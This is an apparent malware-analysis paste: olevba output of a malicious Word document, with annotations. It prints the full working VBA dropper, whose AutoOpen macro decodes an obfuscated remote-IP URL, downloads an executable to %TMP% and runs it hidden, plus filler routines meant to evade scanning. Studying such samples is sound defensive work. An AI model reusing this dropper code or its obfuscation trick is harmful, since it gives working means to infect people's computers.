dynamoo

Malicious Word macro

Mar 13th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. XML:MAS---- 2773kxh.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 2773kxh.doc
  10. Type: Word2003_XML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
      ' Auto-exec entry point (the AutoOpen row in the ANALYSIS table
      ' below): Word runs this as soon as the document is opened with
      ' macros enabled. VBA names are case-insensitive, so "autoopen"
      ' is the AutoOpen trigger. Its only job is to call z4vF73d, which
      ' is defined in the other .bas module of this VBA project and
      ' holds the download-and-execute logic.
  16. z4vF73d
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO ÀâïàâÀ.bas
  27. in file: editdata.mso - OLE stream: u'VBA/\u0410\u0432\u043f\u0430\u0432\u0410'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Public Function IOVANMdhjbAO(ySIzNYGGtuUeqS As String) As String
      ' String de-obfuscator. Walks the input with Step 2 starting at
      ' 1-based position 1 and keeps only the character at each odd
      ' position, so every second character of the input is throw-away
      ' padding. An empty input yields "" (the loop never runs).
      ' The callers in the other module build the input from long
      ' Chr$() chains, so the plaintext (URL, env var name, drop path)
      ' never appears in the macro text and keyword/IOC scanning of the
      ' raw source misses it; apply this function to recover it.
  31. For QpHTHEyQNlU = 1 To Len(ySIzNYGGtuUeqS) Step 2
  32. IOVANMdhjbAO = IOVANMdhjbAO & Mid(ySIzNYGGtuUeqS, QpHTHEyQNlU, 1)
  33. Next
  34. End Function
  35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  36. ANALYSIS:
  37. No suspicious keyword or IOC found.
  38. -------------------------------------------------------------------------------
  39. VBA MACRO ÀÏÀÂÏàâïâ.bas
  40. in file: editdata.mso - OLE stream: u'VBA/\u0410\u041f\u0410\u0412\u041f\u0430\u0432\u043f\u0432'
  41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  42. #If VBA7 Then
      ' Win32 import of urlmon!URLDownloadToFileA under an obfuscated
      ' alias. The identifier is a Cyrillic (CP1251) name; this listing
      ' shows it as Latin-1 mojibake, and olevba prints the real stream
      ' name as \u0410\u041f... in the header above. The five parameters
      ' line up with the API's (pCaller, szURL, szFileName, dwReserved,
      ' lpfnCB) signature. This branch uses PtrSafe/LongPtr so the
      ' declaration also loads in 64-bit Office.
  43.     Private Declare PtrSafe Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
  44.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  45.     ByVal ÏÀÌÎÐâûà As String, _
  46.     ByVal ÏÀÌÎÐâûàf As String, _
  47.     ByVal ÏÀÌÎÐâûàfd As Long, _
  48.     ByVal ÏÀÌÎÐâûàfds As LongPtr) As LongPtr
  49. #Else
      ' Legacy 32-bit-only form (pre-VBA7 Office) with plain Long
      ' handles; same function, same alias.
  50.     Private Declare Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
  51.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  52.     ByVal ÏÀÌÎÐâûà As String, _
  53.     ByVal ÏÀÌÎÐâûàf As String, _
  54.     ByVal ÏÀÌÎÐâûàfd As Long, _
  55.     ByVal ÏÀÌÎÐâûàfds As Long) As Long
  56. #End If
  57. Sub z4vF73d()
      ' Dropper body, reached from autoopen in ThisDocument.
      ' Both arguments are Chr$() chains passed through IOVANMdhjbAO
      ' (every second character discarded). Decoding them by hand:
      '   arg 1 : hxxp://95.163.121[.]186/api/gbb1.exe   (download URL - IOC)
      '   arg 2 : Environ("TMP") & "\GHjkdfg.exe"        (drop path in %TMP%)
      ' The helper below then downloads arg 1 to arg 2 and executes it.
      ' The discarded filler bytes include Chr$(127..129), whose
      ' rendering is codepage-dependent, but they never reach the decoded
      ' string. olevba reported no IOC for this module because the URL
      ' only exists after de-obfuscation - do not rely on the raw-text
      ' scan when triaging samples that use this pattern.
  58. ïðïàðûâà IOVANMdhjbAO(Chr$(104) & Chr$(56) & Chr$(116) & Chr$(65) & Chr$(116) & Chr$(92) & Chr$(112) & Chr$(85) & Chr$(58) & Chr$(52) & Chr$(47) & Chr$(78) & Chr$(47) & Chr$(127) & Chr$(57) & Chr$(127) & Chr$(53) & Chr$(79) & Chr$(46) & Chr$(96) & Chr$(49) & Chr$(120) & Chr$(54) & Chr$(74) & Chr$(51) & Chr$(112) & Chr$(46) & Chr$(72) & Chr$(49) & Chr$(118) & Chr$(50) & Chr$(53) & Chr$(49) & Chr$(102) & Chr$(46) & Chr$(53) & Chr$(49) & Chr$(75) & Chr$(56) & Chr$(63) & Chr$(54) & Chr$(98) & Chr$(47) & Chr$(66) & Chr$(97) & Chr$(110) & Chr$(112) & Chr$(78) & Chr$(105) & Chr$(99) & Chr$(47) & Chr$(110) & Chr$(103) & Chr$(103) & Chr$(98) & Chr$(125) & Chr$(98) & Chr$(58) & Chr$(49) & Chr$(86) & Chr$(46) & Chr$(101) & Chr$(101) & Chr$(104) & Chr$(120) & Chr$(122) & Chr$(101) & Chr$(68)) _
  59. , Environ(IOVANMdhjbAO(Chr$(84) & Chr$(99) & Chr$(77) & Chr$(70) & Chr$(80) & Chr$(83))) & IOVANMdhjbAO(Chr$(92) & Chr$(97) & Chr$(71) & Chr$(129) & Chr$(72) & Chr$(81) & Chr$(106) & Chr$(79) & Chr$(107) & Chr$(110) & Chr$(100) & Chr$(91) & Chr$(102) & Chr$(96) & Chr$(103) & Chr$(80) & Chr$(46) & Chr$(128) & Chr$(101) & Chr$(84) & Chr$(120) & Chr$(43) & Chr$(101) & Chr$(39))
  60. End Sub
  61. Function ïðïàðûâà(zOF3 As String, Dm4y As String) As Boolean
      ' Download-and-execute helper: zOF3 is the URL, Dm4y the local path.
      ' Calls the urlmon import (URLDownloadToFileA) with a null caller,
      ' reserved = 0 and no callback, then Shell()s the downloaded file
      ' with WindowStyle 0 (vbHide), i.e. no visible window.
      ' Neither return value is checked: Shell runs even if the download
      ' failed, and the declared Boolean result is never assigned, so
      ' the function always returns False. Both assignment targets are
      ' undeclared Variants (no Option Explicit appears in the listing).
  62. âûàûâÀÀâûà = ÌÐÎìîðÌÐÎàâï(0&, zOF3, Dm4y, 0&, 0&)
  63. ïðïàÀàï = Shell(Dm4y, 0)
  64. End Function
  65.  
  66.  
  67.  
  68.  
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70. ANALYSIS:
  71. +------------+--------------------+-----------------------------------------+
  72. | Type       | Keyword            | Description                             |
  73. +------------+--------------------+-----------------------------------------+
  74. | Suspicious | Lib                | May run code from a DLL                 |
  75. | Suspicious | Shell              | May run an executable file or a system  |
  76. |            |                    | command                                 |
  77. | Suspicious | Environ            | May read system environment variables   |
  78. | Suspicious | Chr                | May attempt to obfuscate specific       |
  79. |            |                    | strings                                 |
  80. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  81. +------------+--------------------+-----------------------------------------+
  82. -------------------------------------------------------------------------------
  83. VBA MACRO Class1.cls
  84. in file: editdata.mso - OLE stream: u'VBA/Class1'
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  86. Public Sub VJfmjcZhYHWzt89()
      ' Filler routine, not referenced anywhere in the listing. `wn` is
      ' never declared, so without Option Explicit it is Empty (0) and
      ' "For ... = 8 To 0" never iterates; the string below is assigned
      ' and discarded. Presumably padding to bulk out the project and
      ' dilute heuristic scoring - no payload here.
  87. Dim caEhbvHeVNIEE28 As Integer
  88. For caEhbvHeVNIEE28 = 8 To wn
  89. DoEvents
  90. Next caEhbvHeVNIEE28
  91. Dim DcsgpIlJKVLll87 As String
  92. DcsgpIlJKVLll87 = "UDMGtgGDgYjFI65"
  93. End Sub
  94.  
  95. Public Sub rEFykkBadCmlT28()
      ' Filler routine, not referenced anywhere in the listing. `zo` is
      ' never declared (Empty/0 without Option Explicit), so the loop
      ' never iterates and the string is assigned then discarded.
      ' Presumably padding - no payload here.
  96. Dim PxdhIsVstODSN96 As Integer
  97. For PxdhIsVstODSN96 = 6 To zo
  98. DoEvents
  99. Next PxdhIsVstODSN96
  100. Dim lyRYKztwOtcCv68 As String
  101. lyRYKztwOtcCv68 = "QpVdrqKVaheqW83"
  102. End Sub
  103.  
  104. Public Sub xHCiwNdMbiMXH41()
       ' Filler routine, not referenced anywhere in the listing. `AZ` is
       ' never declared (Empty/0 without Option Explicit), so the loop
       ' never iterates and the string is assigned then discarded.
       ' Presumably padding - no payload here.
  105. Dim DMjDUoNwJkvod99 As Integer
  106. For DMjDUoNwJkvod99 = 6 To AZ
  107. DoEvents
  108. Next DMjDUoNwJkvod99
  109. Dim MbOCKZMnWgyDP71 As String
  110. MbOCKZMnWgyDP71 = "dLnHyOaEiCcXm17"
  111. End Sub
  112.  
  113. Public Sub pRsFNsbPhfYFW88()
       ' Filler routine, not referenced anywhere in the listing. `Hd` is
       ' never declared (Empty/0 without Option Explicit), so the loop
       ' never iterates and the string is assigned then discarded.
       ' Presumably padding - no payload here.
  114. Dim hZLjOUpaCBMMS47 As Integer
  115. For hZLjOUpaCBMMS47 = 7 To Hd
  116. DoEvents
  117. Next hZLjOUpaCBMMS47
  118. Dim iqHqrfwpCwVKm36 As String
  119. iqHqrfwpCwVKm36 = "TZxKCjtsLEbMO94"
  120. End Sub
  121.  
  122. Public Sub qWpQUsRUDvlHS43()
       ' Filler routine, not referenced anywhere in the listing. `BO` is
       ' never declared (Empty/0 without Option Explicit), so the loop
       ' never iterates and the string is assigned then discarded.
       ' Presumably padding - no payload here.
  123. Dim IdGlnffOOYXKa12 As Integer
  124. For IdGlnffOOYXKa12 = 4 To BO
  125. DoEvents
  126. Next IdGlnffOOYXKa12
  127. Dim jYPxUyallTLis72 As String
  128. jYPxUyallTLis72 = "WIblPzwJHhazc55"
  129. End Sub
  130.  
  131. Public Sub ljeCsroJoUhyE78()
       ' Filler routine, not referenced anywhere in the listing. `Uz` is
       ' never declared (Empty/0 without Option Explicit), so the loop
       ' never iterates and the string is assigned then discarded.
       ' Presumably padding - no payload here.
  132. Dim VlLLfBEgYlxNH62 As Integer
  133. For VlLLfBEgYlxNH62 = 3 To Uz
  134. DoEvents
  135. Next VlLLfBEgYlxNH62
  136. Dim BBwgLcWwNGMPI35 As String
  137. BBwgLcWwNGMPI35 = "gqyUHUrqCVfvX89"
  138. End Sub
  139.  
  140. Public Sub htVyaunRmFwQL32()
       ' Filler routine, not referenced anywhere in the listing. `QX` is
       ' never declared (Empty/0 without Option Explicit), so the loop
       ' never iterates and the string is assigned then discarded.
       ' Presumably padding - no payload here.
  141. Dim TjUvVjOmkCGbi21 As Integer
  142. For TjUvVjOmkCGbi21 = 8 To QX
  143. DoEvents
  144. Next TjUvVjOmkCGbi21
  145. Dim rLdSRlDmsMiEB93 As String
  146. rLdSRlDmsMiEB93 = "uBpzNGLNvRppY68"
  147. End Sub
  148.  
  149. Public Sub yETfojXKzCRAj76()
       ' Filler routine, not referenced anywhere in the listing. `ej` is
       ' never declared (Empty/0 without Option Explicit), so
       ' "For ... = 1 To 0" never iterates and the string is assigned
       ' then discarded. Presumably padding - no payload here.
  150. Dim pOEEEDavfUYoV65 As Integer
  151. For pOEEEDavfUYoV65 = 1 To ej
  152. DoEvents
  153. Next pOEEEDavfUYoV65
  154. Dim mgSnlzcAerxTa65 As String
  155. mgSnlzcAerxTa65 = "ZlbRmltyNfIuf63"
  156. End Sub
  157.  
  158. Public Sub pEXQlfifgpFAb63()
       ' Filler routine, not referenced anywhere in the listing. `fc` is
       ' never declared (Empty/0 without Option Explicit), so
       ' "For ... = 1 To 0" never iterates and the string is assigned
       ' then discarded. Presumably padding - no payload here.
  159. Dim kIPGmTHKqlBzS46 As Integer
  160. For kIPGmTHKqlBzS46 = 1 To fc
  161. DoEvents
  162. Next kIPGmTHKqlBzS46
  163. Dim TmBfAKqohhFMq17 As String
  164. TmBfAKqohhFMq17 = "oRtXhFaWkBPgf45"
  165. End Sub
  166.  
  167.  
  168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  169. ANALYSIS:
  170. No suspicious keyword or IOC found.